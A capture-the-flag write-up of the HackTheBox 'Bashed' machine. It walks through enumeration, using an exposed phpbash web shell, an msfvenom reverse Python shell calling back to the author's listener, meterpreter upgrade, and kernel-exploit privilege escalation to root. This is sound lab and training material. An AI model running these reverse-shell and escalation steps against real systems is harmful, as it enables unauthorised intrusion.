Bashed

4 March 2021
HackTheBox Windows

Starting information

  • Machine IP : 10.10.10.68
  • System : Linux

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

/etc/hosts
10.10.10.68 bashed

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- bashed -Pn

PORT      STATE  SERVICE
80/tcp    open   http

The web page is just a simple blog that promotes phpbash, a standalone, semi-interactive web shell.

I start nmap scripts on the open port to gather more information:

nmap -p80 -A -Pn bashed

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Information gathered

Operating System

Ubuntu

Open ports

PortService
80/tcphttp

Getting a shell

I use gobuster to enumerate possible directories used:

gobuster dir -u http://10.10.10.68 -w Resources/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

The directory /dev leads to an instance of phpbash: I now have a working shell. This immediately gives me the user flag located in /home/arrexel/user.txt. I also notice that there is another user named scriptmanager. I now need to get root, but first, lets get a fancy shell.

The first step is to start listening for incoming connections:

  1. I start msfconsole
  2. Then I select the exploit 'multi/handler' use exploit/multi/handler
  3. I choose the payload 'reverse_python': set payload cmd/unix/reverse_python
  4. I configure the listening host with my IP and set the listening port to 4446 set LPORT 4446
  5. I start listening for incoming connections with exploit

Now I use msfvenom to craft the payload:

  1. msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.9 LPORT=4446 -f raw > payload.py creates the payload
  2. I copy the code and paste it into the web shell and execute it
[*] Started reverse TCP handler on 10.10.14.9:4446
[*] Command shell session 1 opened (10.10.14.9:4446 -> 10.10.10.68:59068) at 2021-03-03 16:07:47 +0100

I now have a nicer shell, but still not nice enough. To upgrade it to a meterpreter shell I use background to put the current session in the background. Then sessions -u 1 to upgrade the session.

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.9:4433
[*] Sending stage (976712 bytes) to 10.10.10.68
[*] Command stager progress: 100.00% (773/773 bytes)

Now I can select my new fancy meterpreter shell with sessions 2.

I didn't manage to make it work on the first try. I used some scripts, then the payload reverse_bash but this way worked best for me.

Privilege escalation

The first thing to try is look for existing public privilege escalation exploits. The kernel info is:

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

To automatically get some exploit suggestions I use linux-exploit-suggester. I download it on my local machine and upload it to the server thanks to my meterpreter shell:

meterpreter > upload Challenges/htb/bashed/linux-exploit-suggester-2.pl /tmp

I then drop into a usual shell with shell, make the script executable and run it

chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 4.4.0
  Searching 72 exploits...

  Possible Exploits
  [1] af_packet
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [3] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [4] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010

I search for each CVE in msfconsole and find a potential candidate:

msf6 exploit(multi/handler) > search 14665

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank   Check  Description
   -  ----                                                 ---------------  ----   -----  -----------
   0  exploit/aix/local/xorg_x11_server                    2018-10-25       great  Yes    Xorg X11 Server Local Privilege Escalation
   1  exploit/multi/local/xorg_x11_suid_server             2018-10-25       good   Yes    Xorg X11 Server SUID logfile Privilege Escalation
   2  exploit/multi/local/xorg_x11_suid_server_modulepath  2018-10-25       good   Yes    Xorg X11 Server SUID modulepath Privilege Escalation

I try to exploit all of them but nothing worked, so I move on to the dirty cow. I compile the script (as described in the comments), upload it to the server and run it but without much success. I move on to get rekt and finally I get a root shell:

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The challenge is owned, the only thing left to do is to retrieve the root flag.

Back to Write-Ups